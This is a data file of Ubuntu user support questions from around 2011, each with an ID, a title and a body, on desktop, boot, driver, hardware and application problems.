85350	fuzzy font in gnome shell top panel	i have ubuntu 11.10 running gnome-shell . the font on the top panel is fuzzy as shown below . the font displayed in applications is clear . how to have clear font in the top panel ?
85357	kubuntu 11.04 dpkg interrupted	i ran 'sudo dpkg -- configure -a ' in a terminal . i was shown a dos menu looking blue panel with some choices relating to keymap selections . i am not able to enter any data . how can i fix this problem ?
85364	os only reports 4.1gb of ram and not the 6gb that is installed ... why ?	my ubuntu 64-bit 11.10 installed box has 6gb ram but ubuntu only uses 4.1gb . i have read various things about the 4gb limit etc , but all those talk about using less than 4gb . what could be causing this ? my hardware : asus p5q pro intel core 2 quad q6600 @ 2.40ghz x4 geforce 9600gt ( 1024mb ) card not integrated 3x 2gb ddr2 ram modules - pc-6400 output of uname -a linux asus-p5q-pro 3.0.0-13-generic # 22-ubuntu smp wed nov 2 13:27:26 utc 2011 x86_64 x86_64 x86_64 gnu/linux
85370	unity not starting for old user account	installed 11.10 fresh but with a previously used /home/bob directory mounted . unity does not start when i log in as 'bob ' , but does work as a guest , as well as for a new users account i made , 'bob2 ' . if i start in 2d then run unity from command line , it works ( this is my current work-around ) . things i have tried : unity -- reset removed all settings directories ( rm -rf .gconf .gnome2 etc ) installed ccsm and un/re-enabled unity , and removed conflicts ( there were some ) none seem to solve the problem . any ideas ?
85373	how do i report a bug in a kernel if it wo n't boot ?	i have a problem on my machine with all of the kernels from : 2.6.38-8 ( the default kernel in natty narwhal ) upto the present kernel in 12.04 precise pangolin basically the kernel wont boot meaning i ca n't use apport to collect data for the bug my hardware spec doing a verbose boot shows the boot hanging on this line ohci_hcd 0000:00:12.1 : irq 16 , io mem 0xfe02d000 having done a bit of research on the subject ohci is in relation to the usb bus any advice about how to report this on launchpad would be appreciated and any work around suggestions would be welcome as far as i can tell replacing the kernel in the official image with an older or hacked newer one which i have no idea how to do .
85374	how to change fontsize for the panel text with gnome 3.2 ?	i do n't have very good eyes . so i use a huge monitor . to get a sharp picture i use it in it 's original resolution 1920 x 1200 . then i change the size of all fonts to about at least 150 % the original size . this gives me all kinds of problems that really annoy me . obviously some dialog boxes do n't scale with it like they used to with classic gnome . lots of lists and menues have fixed dimensions also it seems . looks awful . still my best chance of working with it . but when i apply any theme the top panel of gnome 3.2 does n't scale at all . the fonts stay tiny , the panel menues also . ( as the tabs in chrome do ! ) how can i apply a theme to full effect so that the gnome panel scales with the font size i set within the system settings ?
85376	gmusicbrowser comment tag no longer available to be edited	after update 10.10 to 11.10 with gnome 3 , gmb 1.1.7 if i want to edit the comment tag ( right click/songs proprieties ) , i ca n't because the box with the comment 's content just disappeared . this is the only tag where it happens , all the others ( title , artist , album , etc ) are still there . is it a bug that i should report ?
85381	file system issue : ca n't access windows partition & mtab wo n't open	i 've installed ubuntu 10.04 on an usb drive a few days ago , and have been mostly using linux since them ( but i`ve been able to start windows properly after using the pen drive linux ) . now , i guess i 've got two problems . i 'm not sure both would fit this forum , but as i suspect the first might have caused the later , here they go : today , when i tried to restart my computer and boot windows from internal hdd ntfs partition , i got a blue screen with error code 0x0024 ( a lot more 0 's there ) , saying a problem was detected and windows has been shutdown to prevent damage , etc ... no useful information . i could n't even boot in the safe mode . my first thought was i might still be able to access the windows file system from linux , what took me to the next problem : after booting ubuntu from the usb drive , i tried to access the windows filesystem from gui menu `` places - > 54gb filesystem '' , but it says `` according to mtab /dev/sda2 is already mounted on /media/227c59c27c599181 '' . trying to mount from the command line also does n't work , it says sda2 is already mounted on wherever i try to mount it . trying to open /etc/mtab says `` input/output error '' . i noticed the following error message on dmesg : `` ext2-fs error ( device loop1 ) : ext2_lookup : deleted inode referenced : 98399 . '' is it possible that a disk partition failure may have caused the /etc/mtab damage ? can i recover/repair the /etc/mtab file ? how ? additionally , i also tried booting with a windows xp install disk ( not the same i 've on my disk , as that is still factory installed ) , hoping i could use the system repair option . the windows installation system recognized my hard drive , all partitions are shown correctly , except that for the c partition the filesystem type is displayed as `` unknown '' . thanks in advance , to anyone who can provide some advice on what i could do to solve either of these problems . update : i managed to fix my ntfs partition by running chkdsk from hbcd , and now i can boot on windows again . however , i 've not yet get back to linux to see if that would eventually solve to mtab issue too .
85384	problem with desktop wallpaper slideshow	i have a problem with a wallpaper slideshow that i created ( i am using gnome 3 classic interface on oneiric ocelot ) . i followed the new `` standard procedure '' to create a new slideshow background on ubuntu 11.10 , as i read in some other topics here ( i.e . i created a new .xml file for background slideshows , containing the locations of the pictures i wanted to show in it ; then , i edited the background-1.xml file in usr/share/gnome-background-settings adding my new background file location to make it appear in the `` appearance '' menu , from which i selected it ) . the problem that i have now is that my slideshow is behaving in a weird way : the pictures change in a totally random manner ( i set 600 in the time field , which stands for 10 minutes , but instead they change every 2-3 minutes ) ; even more , the picture rotating are actually only a few from the original ones that i set in the .xml file , and they rotate in a random order ! i thought that maybe the problem was in some syntax error i made in the .xml file , but i deleted and created a new .xml file ( with a new file location , too ) for 3-4 times and i still get the same errors ! maybe the first version of the file is somehow still memorized somewhere , and it is causing the newer versions of the file to have all of these problems ? thanks to anyone who manages to help me with this ! : ) ( edit ) here is the xml file i used , i changed the location to a random /location/ , anyway the location in the original file is correct , because it has no problem locating the pictures : < background > < starttime > < year > 2009 < /year > < month > 08 < /month > < day > 04 < /day > < hour > 00 < /hour > < minute > 00 < /minute > < second > 00 < /second > < /starttime > < static > < duration > 600.0 < /duration > < file > /location/1.jpg < /file > < /static > < transition > < duration > 5.0 < /duration > < from > /location/1.jpg < /from > < to > /location/2.jpg < /to > < /transition > < static > < duration > 600.0 < /duration > < file > /location/2.jpg < /file > < /static > < transition > < duration > 5.0 < /duration > < from > /location/2.jpg < /from > < to > /location/3.jpg < /to > < /transition > < static > < duration > 600.0 < /duration > < file > /location/3.jpg < /file > < /static > < transition > < duration > 5.0 < /duration > < from > /location/3.jpg < /from > < to > /location/4.jpg < /to > < /transition > < static > < duration > 600.0 < /duration > < file > /location/4.jpg < /file > < /static > < transition > < duration > 5.0 < /duration > < from > /location/4.jpg < /from > < to > /location/5.jpg < /to > < /transition > < static > < duration > 600.0 < /duration > < file > /location/5.jpg < /file > < /static > < transition > < duration > 5.0 < /duration > < from > /location/5.jpg < /from > < to > /location/6.jpg < /to > < /transition > < static > < duration > 600.0 < /duration > < file > /location/6.jpg < /file > < /static > < transition > < duration > 5.0 < /duration > < from > /location/6.jpg < /from > < to > /location/7.jpg < /to > < /transition > < static > < duration > 600.0 < /duration > < file > /location/7.jpg < /file > < /static > < transition > < duration > 5.0 < /duration > < from > /location/7.jpg < /from > < to > /location/8.jpg < /to > < /transition > < static > < duration > 600.0 < /duration > < file > /location/8.jpg < /file > < /static > < transition > < duration > 5.0 < /duration > < from > /location/8.jpg < /from > < to > /location/9.jpg < /to > < /transition > < static > < duration > 600.0 < /duration > < file > /location/9.jpg < /file > < /static > < transition > < duration > 5.0 < /duration > < from > /location/9.jpg < /from > < to > /location/10.jpg < /to > < /transition > < static > < duration > 600.0 < /duration > < file > /location/10.jpg < /file > < /static > < transition > < duration > 5.0 < /duration > < from > /location/10.jpg < /from > < to > /location/11.jpg < /to > < /transition > < static > < duration > 600.0 < /duration > < file > /location/11.jpg < /file > < /static > < transition > < duration > 5.0 < /duration > < from > /location/11.jpg < /from > < to > /location/12.jpg < /to > < /transition > < static > < duration > 600.0 < /duration > < file > /location/12.jpg < /file > < /static > < transition > < duration > 5.0 < /duration > < from > /location/12.jpg < /from > < to > /location/1.jpg < /to > < /transition > < /background >
85386	does ubuntu one handles special characters ?	does ubuntu one have problems with special characters in the path ? c : \documents and settings\renăš\ubuntu one this path seems to cause immediate problems . it ca n't sync and when i try to add a directory , it crashes . a window pops up saying : unicodedecodeerror 'ascii' 'c : \\documents and settings\\ren\xe9' 29 30 'ordinal not in range ( 128 ) ' i 'm working with windows xp , sp3 . i downloaded ( i hope ) the latest version of u1 : 2.0.2 . i see in the dashboard the path : c : \documents and settings\renăš\ubuntu one as soon as i click on add folder the pop up appears .
85389	how to fix jupiter autostart ?	i accidentally delete the option for jupiter applet from startup applications . how can i fix it ?
85392	tools to manage server through ssh	any tool like this in ubuntu server so i can manage easily my server through ssh yast tool open in ssh
85394	unity 3d wo n't work on an nvidia ion	on a zbox hd-nd22 with ion gpu instead of unity 3d i always get unity 2d . when booting from a live cd it works but it 's using the noveau driver which has no hdmi sound . i have tried this command for compatibility test : /usr/lib/nux/unity_support_test -p the output is : opengl vendor string : nvidia corporation opengl renderer string : ion/pci/sse2 opengl version string : 3.3.0 nvidia 280.13 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes segmentation fault it looks good until the segmentetion fault . in the test i had run in live cd mode this was n't present . has anyone an idea how to solve this problem ? i have tried both , version current and version current-updates of the nvidia driver
85396	lenovo s12 fails to hibernate , wo n't turn off and wo n't restore session , what to do ?	my lenovo s12 ( intel atom ) running 11.10 unity desktop will not hibernate . if i use the shutdown/hibernate option , it will go to a blank screen with an flashing underscore cursor in the upper left of the screen . if i power-off then using the power button on the laptop , it will shut off but does not restore the session . how can i get this to work as designed ? added note : i tried the solution here , but it did n't work . after this , instead of hanging with the flashing underscore cursor , it now hangs with the following text ... looking for splash system ... none s2disk : snapshotting system also the /etc/fstab now shows six swap partitions instead of the one swap partition used before a clean install from an 11.04 prior installation . i have fixed the swap partition , now have a single , dedicated swap partition . fixing this did not solve the hibernate problem . another added note : the only proprietary driver on the system is the `` broadcom 802.11 linux sta wirelessâś ''
85397	is medibuntu needed - or even desirable ?	recently i started having a problem when checking for updates : the process stalled for several minutes while connecting to the medibuntu site . this happened every time . ( mysteriously , this only happened on one of my two computers . ) getting tired of this , i unchecked medibuntu in my software sources , and everything speeded up again . is this something i will regret ? i have some things installed from medibuntu , but once installed do i get anything by getting updates from medibuntu ? or are things now provided elsewhere - like in multiverse - sufficiently now so that i no longer need medibuntu ?
85408	why are there multiple ( 6 ) swap partitions after ubuntu clean install ?	after several multiple clean re-installations of ubuntu 11.10 x86 from the original 11.04 on my lenovo s12 ( intel atom ) laptop , i find i have six swap partitions . the original 11.04 had only one . i believe i only need one and wonder why ( and how ) all these extra partitions appeared , un-noticed until i start to try to make hibernate function properly . is this normal , or is it a bug ? from my terminal ... - @ - : ~ $ cat /etc/fstab | grep swap # swap was on /dev/sda10 during installation uuid=d30c8114-cc1a-49d3-8924-be46a64c5be5 none swap sw 0 0 # swap was on /dev/sda2 during installation uuid=39421e04-b191-48a1-bfef-04ad1ad77329 none swap sw 0 0 # swap was on /dev/sda5 during installation uuid=5e047822-53ed-4f2a-bd5a-b25804f41dda none swap sw 0 0 # swap was on /dev/sda6 during installation uuid=e6589d14-fb5f-4e88-89d0-b3117a5382c9 none swap sw 0 0 # swap was on /dev/sda7 during installation uuid=71519d3c-8d4b-4e1d-a380-9d1f8d38fd04 none swap sw 0 0 # swap was on /dev/sda8 during installation uuid=43bfad50-23f1-4813-b622-fe78558f73a1 none swap sw 0 0 and ... - @ - : ~ $ sudo fdisk -l | grep swap /dev/sda2 207722496 215533567 3905536 82 linux swap / solaris /dev/sda5 308408320 312580095 2085888 82 linux swap / solaris /dev/sda6 304234496 308400127 2082816 82 linux swap / solaris /dev/sda7 300060672 304222207 2080768 82 linux swap / solaris /dev/sda8 295886848 300046335 2079744 82 linux swap / solaris /dev/sda10 291713024 295884799 2085888 82 linux swap / solaris note : /dev/sda2 was the original swap partition .
85410	how do i subscribe to a tag in launchpad ?	i 'm interested in several tags withing a project 's bug report page , but would only like to receive email when a bug is tagged with certain criteria ( ie : new-charm ) how can i do this in launchpad ?
85415	how to install grub2 on macbook pro with the grub-install command without warning about `` blocklists '' requiring the use of -- force ?	i have a macbook pro 5,2 and i 've had a sporadic problem with having to reinstall grub after a system update . this has happened with several of the recent versions of ubuntu , although i do n't have an exact record of which ones . every once in a while , after a system update with the update manager , i can no longer boot into ubuntu unless i repair the grub installation manually . to do that i follow this procedure : https : //help.ubuntu.com/community/grub2 # reinstalling_grub2 by following the instructions under chroot . that always works to reinstall things , but as you can imagine , it 's not my favorite thing to do and takes about a half hour each time . one problem i run into when trying to follow those instructions is that when i get to step # 11 where i am supposed to run grub-install /dev/sda , it always tells me that i can not execute that command because it would have to use `` blocklists '' which are inherently unstable , and the the only way to proceed is to use the -- force option on grub-install . so i use the -- force option and it does install it , but the fact that it does not go according to the instructions has me concerned that perhaps that is the source of the instability that the warning is telling me about . but it wo n't let me reinstall it any other way . as background information i might mention as background that i have refit installed on the mac side , in case that is a source of the problem because it 's conflicting with or fighting with grub over the boot sector or something like that . i also have not been able to boot into os/x from grub even though it 's on the grub startup menu . it just hangs and does nothing if i select that . in order to boot into os/x i have to use the hardware support on the mac by pressing the option key while it 's booting and then selecting the os/x partition , which then boots via refit . conversely i can not boot into ubuntu via refit even though that partition shows up on the refit menu ( as a windows partition because i think refit assumes anything that is n't os/x is `` windows '' ) . finally here is the output of sudo fdisk -l for my system : warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000001 device boot start end blocks id system /dev/sda1 1 26 204819+ ee gpt /dev/sda2 * 26 12972 103986412 af hfs / hfs+ /dev/sda3 12972 25767 102782192 83 linux /dev/sda4 25768 59272 269128912 83 linux osx is installed on sda2 . the linux root is installed on sda3 and my /home folder is on sda4 . the entire macbook pro dual boot process is a bit of a mystery to me , so i am including as much information as i can in case some of it is useful . thanks in advance for any help .
85419	how-to recover previous swap partitions space ?	after several clean re-installations of ubuntu 11.10 on my lenovo s12 laptop ( intel atom ) , i found i have five new swap partitions in addition to the original swap partition on 11.04 . not only do they significantly slow down the system , each additional swap stole disk space from my root partition . originally 50gb , it was now down to 39gb . i used `` disk utility '' to discover which partitions were superfluous ( /dev/sd⋯ , … ) then edited as super·user the /etc/fstab file commenting out them . then rebooted . after reboot , i used `` disk utility '' again to delete the five superfluous partitions . not the question is , how do i re-size the root partition to recover the stolen space ?
85421	installing acroread without browser plugin	the acroread packages includes both the standalone viewer and the browser plugin . i need acroread for some annoying javascript-laced pdfs , but as an everyday viewer i prefer evince . does anyone know how to install just the standalone viewer in 11.10 oneiric ?
85422	skype memory leak issue on startup	once in a while when i start skype my ram memory spikes-up continuously , extending till hdd swaping starts . i 've noticed this behavior on my 32bit natty installation , 32 bit oneiric and 64bit oneiric . all systems were fully updated . this issue is very annoying because the system becomes quickly unusable if you do n't force skype to close asap . am i the only one that has this ? is there a fix for it ? i tried to file a bug on launchpad but there is no place there where i can `` complain '' .
85425	huawei e1752 mobile broadband usb modem does not work	i have been using ubuntu 11.04 with my usb modem flawlessly . i upgraded to 11.10 a month ago , and since then , the modem is not detected by my computer . the modem manager does not give me the `` enable mobile broadband '' option when plugging it in , and the light on the usb modem that indicates it works does not go on . it works on my windows boot on the same machine , so it is not hardware related . if there are any debugging logs i should post , i will be happy to , but please let me now which ( ubuntu newbie ) .
85426	is there a way to see only the applications running in a specific workspace ?	i rarely have use for wokrspaces , but when i do , it is because i have lots of windows open and want to divide them to different desktops ( workspaces ) for clarity . however the sidebar shows all the opened windows in every workspace , and alt-tab also has every window from every workspace . is there a way to easily see only the windows open in one workspace , so that i could move between the windows of that workspace ? as it is the whole workspace system seems entirely pointless ( since i mostly have maximized windows for text editing and such ) , so i must be missing something here . thank you for your help !
85428	is it possible to pin certain apps to a workspace in unity ?	is there a way to assign apps to a specific workspace in unity ( 11.10 ) ? with this i mean that when i open , for instance rhythmbox , it allways opens in workspace 2 . when i click on libreoffice writer in the dock , it opens in workspace 4 . and so on .
85429	my computer goes to sleep for no reason while i 'm using it	my computer will go to sleep for no reason . it did so two minutes ago while i was using my mouse to navigate the internet . it had power . also , sometimes i am suddenly unable to select anything in a workspace , or bring up the side bar when i move the cursor to it . i am using ubuntu 11.10 on an hp .
85430	stop thunderbird messaging menu from searching archive	the messaging menu tells me i 've got new mail , but often that mail is in an archive directory or my drafts . can i tweak the thunderbird messaging menu in some way to tell it not to look for unread messages in archive ? i wind up archiving a lot of unread messages . without getting into the fact that i should probably just be throwing them straight in the trash , is there a right way to tell unity 's launcher and message-menu indicator that it should only look for unread mail in my inboxes ? it flags new mail in my archive folders as well as new drafts . i really do n't want those flagged .
85435	how to download youtube videos like with realplayer in windows ?	i use to download videos in window and was wondering if there is anything that is open source that can download the videos ? i am using ubuntu 11.10 i am on a hp .
85436	prevent user from using internet	i have created a user with `` connect to wireless and ethernet networks '' unchecked , but the user can still access internet wireless . i have tried to remove nm-applet from the users startup programs , but the user can still run nm-applet without sudo . this seems strange . can anyone help me ? ubuntu version 10.04
85438	compiz grid does n't resize to different sizes	i just started using 11.10 on my new work computer for my new job . i used to be able to use the grid compiz plugin so that when i hit a direction key multiple times it will cycle between 3 different sizes of the window ( 25 % of the screen , 50 % , 75 % ) . with this fresh 11.10 install , it will only do 50 % . does anyone have any idea what is going on ? thanks
85441	using an inputclass section with a serial device in xorg.conf.d	i have a very old rs232 serial tablet ( an acecad iii ) . it does work in ubuntu , because i 've been able to get it to work by disabling hotplug in the x server , but i 'd rather leave input device hotplug enabled . it seems like an inputclass section is what i want . my question is , how do i get the x server to recognize my serial device ( it obviously ca n't autodetect it ) ? i tried inputattach -- dump /dev/ttys0 but x did n't seem to pick it up ( nothing in the log files ) . for reference , here 's the inputclass section i 'm using : section `` inputclass '' identifier `` acecatiii '' driver `` mouse '' matchdevicepath `` /dev/ttys0 '' option `` protocol '' `` acecad '' option `` device '' `` /dev/ttys0 '' endsection i 'm on a fresh install of 11.10 .
85442	anyway to make a livecd from my current installation ?	remastersys is no longer maintained and uck as well as live-magic are n't exactly what i 'm looking for as they remaster a livecd . what i 'm aiming for is something like pclos 's makelivecd so i can have a livecd backup of my ubuntu 11.10 install . i 'm not really looking for a solution that makes incremental backups either . if anyone is familiar with the alienware image / respawn dvd 's , it is something like that even that i have in mind .
85443	no windows 7 entry in grub after installing ubuntu	i installed ubuntu 11.10 on a separate partition . unfortunatelly after installation i could n't see grub menu . ubuntu starts automatically . then i installed the boot-repair and repaired by this software my grub . now i can see grub menu , but there is no windows entry . just ubuntu .
85445	what usb modem to buy ?	i have ubuntu 10.04 installed . on a dell latitude d520 laptop . i need to buy a usb modem as the onboard one was not detected and i have fussed around long enough trying to get it working . what make/model do you all suggest for a usb modem ? i would like to make it as easy to install and use as possible as this laptop is for my parents . thaks guy .
85446	application custom stock icons not visible in application indicator but visible in old system tray	i recently noticed that in ubuntu unity the application indicator ( which replaces the system tray ) does not show the custom icons i added to the gtk stock , but only the basic stock icons . in place of the correct icons i see `` gtk-missing-image '' . on my apps toolbars and menus those icons are displayed properly , the problem is only with the top application indicator . i use gtk ui manager after integrating the stock icons this way : factory = gtk.iconfactory ( ) pixbuf = gtk.gdk.pixbuf_new_from_file ( filepath ) iconset = gtk.iconset ( pixbuf ) factory.add ( stock_name , iconset ) factory.add_default ( ) then the appindicator code : ... .. try : import appindicator has_appindicator = true except : has_appindicator = false ... . if has_appindicator : self.ind = appindicator.indicator ( `` x-tile '' , `` indicator-messages '' , appindicator.category_application_status ) self.ind.set_status ( appindicator.status_active ) self.ind.set_attention_icon ( `` indicator-messages-new '' ) self.ind.set_icon ( `` x-tile '' ) self.ind.set_menu ( self.ui.get_widget ( `` /systraymenu '' ) ) else : self.status_icon = gtk.statusicon ( ) self.status_icon.set_from_stock ( `` tile quad '' ) self.status_icon.connect ( 'button-press-event ' , self.on_mouse_button_clicked_systray ) self.status_icon.set_tooltip ( _ ( `` tile the windows upon your x desktop '' ) ) for full code : hg clone https : //giuspen-x-tile.googlecode.com/hg/ hg_x-tile cd hg_x-tile hg up x-tile2 the icons are visible when using system tray , not with application indicator if anybody solved this problem please help .
85454	how to update a running instance on ec2 without losing data ?	when i try to connect ubuntu on ec2 i get the following message new release 'natty ' available . run 'do-release-upgrade ' to upgrade to it . but when i try to run this command i get this message : this session appears to be running under ssh . it is not recommended to perform a upgrade over ssh currently because in case of failure it is harder to recover . if you continue , an additional ssh daemon will be started at port '1022 ' . do you want to continue ? it says that `` it is not recommended to perform a upgrade over ssh '' . if i ca n't run this over ssh , whats the other alternative to update my ubuntu . also , i really do n't want to loose my data on ec2 .
85462	what is my computer ip address knowing that i have a router ?	my computer is connected to the internet through a wifi-router . i want to have access to my computer remotely , for example using ssh . when i ask my computer what my ip address is , for example by going in the network indicator , i get 192.168.1.101 . but when i go on a website as whatismyip.com , i get a totally different address , probably the one of my router . so what address should i use to access my own computer remotely and not any other machine in my home wifi-network ?
85463	high cpu usage without a process to blame . what is [ migration/x ] ?	for the past few days my computer has been revving its fans while not doing very much . i 'm talking an instance of firefox , gedit , few terminator windows and that 's about it . i have conky running on my desktop and it tells me the following : worse than the noisy fans the power draw ( about 50w if you 'll believe our energy monitor ) are the x lockups . the applications keep freezing and i 'm trying to get work done . all this makes oli a dull boy . i was really confused that neither conky or htop were showing me a process but i 've just run ps aux | sort -k 3 and i 'm seeing a number of processes that look like they might be contributing to my pain : root 6 0.0 0.0 0 0 ? s nov27 0:00 [ migration/0 ] root 7 0.0 0.0 0 0 ? s nov27 0:00 [ migration/1 ] root 11 0.0 0.0 0 0 ? s nov27 0:00 [ migration/2 ] root 14 2589903 0.0 0 0 ? s nov27 21114581:29 [ migration/3 ] root 17 97.2 0.0 0 0 ? s nov27 11543:55 [ migration/4 ] root 26 97.7 0.0 0 0 ? s nov27 11601:34 [ migration/7 ] root 23 99.6 0.0 0 0 ? s nov27 11834:39 [ migration/6 ] root 20 99.7 0.0 0 0 ? s nov27 11837:29 [ migration/5 ] what on earth are these migration things ? more importantly , how can i kill them without nuking my system ? edit : other details . i run on nvidia graphics hardware using the closed-binary driver ( from onereic-updates ) . i have and have recently used virtualbox . it 's an intel motherboard chipset and processor . i have a dmraid-based ssd and a mdraid-based storage `` cluster '' ( where most of my profile lives ) . if you need more , just poke me .
85465	how to control volume of external amp from mythbuntu ( alsa )	i have a mythbuntu setup with s/pdif sound going to an external receiver that amplifies the sound into a 5.1 surround speaker arrangement . currently i have to control the volume on the receiver ( arcam avr 280 ) separately from controlling the rest inside the mythbuntu box . i have hooked up the arcam receiver via its serial interface to my mythbuntu box ( on a usb- > rs232 connection ) and can , in principle , control the arcam amplifier volume through a sequence of published control codes ( the manual has a very detailed appendix explaining how ) . is there a way that i could use to hook volume change request coming from the mythtv setup to a script that control the amplifier volume ? apparently , others are wondering the same and not getting anywhere .
85468	samsung np-r440l edgescrolling not working	well in short i need help when i first got my laptop and installed ubuntu 10.04 32bit version the touchpad edgescrolling worked fine , but ever-since upgrading to 10.10 64 bit ( right now currently running 11.10 64bit ) edge scrolling still is not working , please help me out here would appreciate it very much .
85479	whenever i try to open minecraft.jar with openjdk it does n't work	i tried right clicking and selecting open with jdk but nothing happens
85481	is portfowarding to my localhost on my personal ubuntu computer secure ?	after installing lamp on my personally ubuntu computer , i am running a application that requires to connect to the web and send smtp mail ; for example paypal needs a www address to notify successful or failed payments ... i managed to fix the issue by acquiring a free .tk domain , changing my router preference and port forwarding to my computer ip . is this secure ? i have a firewall , restricting only access to port:80 . it is my personal computer , where i have personal files ( with exception of my /var/www folder ) . is there a better any better option or optimization ? i was thinking of installing a ubuntu server on vmware workstation , and port fowarding to the virtual server instead , but it might take too much resources .
85488	how can i configure 2 video cards to use on 3 monitors ?	how can i configure 2 video card and 3 monitor to use ? i am using 11.10 x64 . one of the cards is a gf8600gts and the other is a gf8400gs .
85491	libreoffice base missing on ubuntu 11.10	i am an occasional user of ubuntu & have upgraded to 11.10 ( loved the prev 8.04 ) but libre office base ( i use databases a lot ) is not available in the new ubuntu from the launcher . does it get installed as part of the package ? if it does how do i access it ? if not how do i install it ?
85494	graphic card installation failure ( nv 9600m gt )	i wanted to switch from 7 to ubuntu . now , the first thing that holds me back is the installation of the driver for my nvidia 9600m gt . ubuntu recommends me 4 drivers from the `` additional driver '' section . now , whatever driver i install , there are four things happening randomly after rebooting : the pc freezes before seeing bootup splash the pc freezes while seeing bootup splash image ( ubuntu logo with the 5 dots ) the pc gets into login screen and freezes instantly ( thought the unity-bar is transparent now ) the pc freezes right after beeing able to login . ( while this is happening the unity-bar changes from transparent to ugly-flat-style ) i also tried to install the official nvidia .run file but after exiting the x-server , it says the driver is not compatible with the kernel and exits installation . can somebody help me ? i really wan na get rid of windows : ( but ubuntu drives me perfectly insane . please answer as noobish as possible . i 'm an expert windows user , but linux is absolutely new to me . my specs : ubuntu 11.10 installed from usb stick ( like 100 times now : / because i dont know how to remove the driver in recovery mode ) 9600m gt 4gb ram intel centrino 2 dual core 2.26ghz win 7 and ubuntu running along side . thank you in advance , regards .
85499	i think my graphic card is not being recognized properly	i own an acer aspire 4736z and i had some problems right after installing ubuntu . had to put the patch for the graphic card , like to make it run as it 's a basic graphic card . now i notice it 's very slow when it comes to inkscape operations and the screen is displaying a strange `` refreshing '' effect like it happened on crt screens . how do i check if my card is being recognized and running correctly ? tia
85501	installation with usb drive over joli os : `` missing operating system '' error	i 've had success installing and running ubuntu 11.10 and lubuntu 11.10 on my acer aspire one d255 in the past , but i can no longer use a usb drive ( using universal-usb-installer-1.8.7.3 ) to install any version of ubuntu . all my prior installs were over either windows xp or another official ubuntu version , but now i 'm running joli os and i ca n't install ubuntu anymore . i get a `` missing operating system '' error , and then joli os boots . i have also installed xp on the acer aspire one , in an attempt to recreate the conditions which worked last time for installing ubuntu , however the same problem persists . is there something wrong with the usb installer program i am using ? or maybe the isos ? any advice ? i have tried the regular installation iso , the alternative . next is the lts iso .
85502	how to install latest bluefish	i am trying to install the latest bluefish 2.2.0 in 11.10 but all i find is the repositories for the older versions of ubuntu . is there any place to find the a ppa or deb package for 11.10 .
85503	how to access the wine directory from dash	before unity i could go to the main menu and navigate to the `` c : '' folder when wine has all the programs . using unity and the dash how can i get to the wine directory quickly since right now what i am doing is going to nautilus , pressing ctrl+l and addint .wine to the location bar so it looks something like /home/cyrex/.wine and then clicking on the drive_c there to enter the real directory i want . is there a way to do it ?
85505	what firewall , anti ddos and anti brute-force managers exist in ubuntu	i have heard of ufw and of course using iptables but is there any other firewall or port manager for incoming/outgoing connections . i am also looking for gui based ones apart from terminal ones and a bonus for any tool used to help in the ddos attacks and automatic banning that come with ubuntu . not talking server only but desktop too .
85508	how to auto answer an incoming skype call ?	is it possible to auto answer to an incoming skype call from specific number or contact ? i think this should work with a python script using skype4py but as i am not a programmer i do n't have an idea how to do this . anybody has any suggestions ?
85515	ubuntu one support for appradio	many iphone apps like pandora , rdio , and aupeo ! have support for appradio will ubuntu one support the device in the future ? it would be awesome to be able to us the interface directly on my app radio - it would encourage me to keep up my subscription and support the project . http : //pioneerelectronics.com/pusa/car/appradio
85518	installing ubuntu 12.04 alpha from usb	as most of you probably know the ubuntu 12.04 alpha has been released . however there is a bug that makes the iso file over sized so that it will not fit on a typical 80min cd . the computer that i wish to use to test it does not have a dvd drive installed or i would just go that route . i have used various usb installation programs in the past to created live-usbs , but none of the programs i have used are updated for ubuntu 12.04 alpha . so i was wondering if anybody has been able to install the alpha from usb and if so , how ? thanks in advance for your time
85524	gnome unity plugin has been disabled from ccsm	the unity plugin of ccsm has been disabled after i uninstall compiz and re-install again and it was replaced by viewport switcher . how can i re-install the unity plugin ?
85528	gnome 3 shell login , how do i get it ?	i installed gnome shell 3.2 and everything is fine other than the fact that i do n't get the newly introduced gnome shell login prompt and instead get either the standard ubuntu lightdm or the standard gdm . what do i need to do to get this ?
85529	touchpad gets stuck on a dell vostro 3450	occasionally my touch-pad freeze and i am unable to use my mouse unless i attach another mouse to the machine this only happens while running on battery power - not while ac is plugged in ( but once it got stuck - connecting to ac does not unstuck it ) the only way i found to unfreeze it is to restart x the machine is : dell vostro 3450 , with ubuntu 11.10 64bit installed on it
85531	how can i add a `` force quit '' button to my unity top-bar ?	the title says it all . in olden times , one could right click the bar , go to `` add to panel '' , and then add the `` force quit '' applet from the list . apparently that does n't work any more .
85534	how to disable/hide paid apps from ubuntu software center ?	is there a way to disable or hide paid apps from ubuntu software center ( ubuntu 11.10 ) ? or a way to permanently filter apps by licence : open source / closed but free / paid ?
85537	ca n't change gnome 3 themes in 11.04	i have recently installed the gnome 3 environment via the ppa . i installed the gnome-themes-standard package i believe , and now i ca n't use the tweak tool or gconf to change the theme because it is stuck on the current one . it seems to not want to change , i have no idea what i have done . i am stuck at my current theme .
85553	how to save files from gimp on usb drive if it 's a read-only-file ?	as i 'm not a professional or expert user on linux at all i need serious help that is easy to understand and easy to implement : i was editing pictures with gimp and then wanted to save them on my usb flash-drive . i then got the information that it 's impossible since the file is a read-only file . is that normal ? can anyone please tell me how to clear this status so that i can save them on my usb flash-drive ? i 'm running the latest version of ubuntu . thanks so much in advance !
85554	how do i restore multiboot function on winxp/ubuntu hard drive ?	i have a multiboot winxp/ubuntu hard drive but something has gone wrong and multiboot stopped working . so , my access to ubuntu installation is lost on the hdd . how do i restore the multiboot function to return to ubuntu ? thanks a lot
85555	how can i get my brother dcp-135c to scan properly ?	i have just intalled from scratch my ubuntu 11.10 64-bits on my desktop and everything is working just fine . i 've also had no problem to get the printer function of my brother dcp-135c working with no problem . i just ca n't get the scanner to work . i 've tried the unsware here but that did nothing . the tricky thing is , if i call the scannig program as administrator ( sudo simple-scan ) it works fine , but i ca n't get it to work as a normal user .
